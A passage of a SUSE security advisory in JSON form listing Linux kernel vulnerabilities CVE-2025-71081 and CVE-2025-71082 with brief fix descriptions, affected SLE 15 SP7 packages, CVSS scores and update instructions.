"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "low"
}
],
"title": "CVE-2025-71080"
},
{
"cve": "CVE-2025-71081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71081"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: stm32: sai: fix OF node leak on probe\n\nThe reference taken to the sync provider OF node when probing the\nplatform device is currently only dropped if the set_sync() callback\nfails during DAI probe.\n\nMake sure to drop the reference on platform probe failures (e.g. probe\ndeferral) and on driver unbind.\n\nThis also avoids a potential use-after-free in case the DAI is ever\nreprobed without first rebinding the platform driver.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71081",
"url": "https://www.suse.com/security/cve/CVE-2025-71081"
},
{
"category": "external",
"summary": "SUSE Bug 1256609 for CVE-2025-71081",
"url": "https://bugzilla.suse.com/1256609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71081"
},
{
"cve": "CVE-2025-71082",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71082"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: btusb: revert use of devm_kzalloc in btusb\n\nThis reverts commit 98921dbd00c4e (\"Bluetooth: Use devm_kzalloc in\nbtusb.c file\").\n\nIn btusb_probe(), we use devm_kzalloc() to allocate the btusb data. This\nties the lifetime of all the btusb data to the binding of a driver to\none interface, INTF. In a driver that binds to other interfaces, ISOC\nand DIAG, this is an accident waiting to happen.\n\nThe issue is revealed in btusb_disconnect(), where calling\nusb_driver_release_interface(\u0026btusb_driver, data-\u003eintf) will have devm\nfree the data that is also being used by the other interfaces of the\ndriver that may not be released yet.\n\nTo fix this, revert the use of devm and go back to freeing memory\nexplicitly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
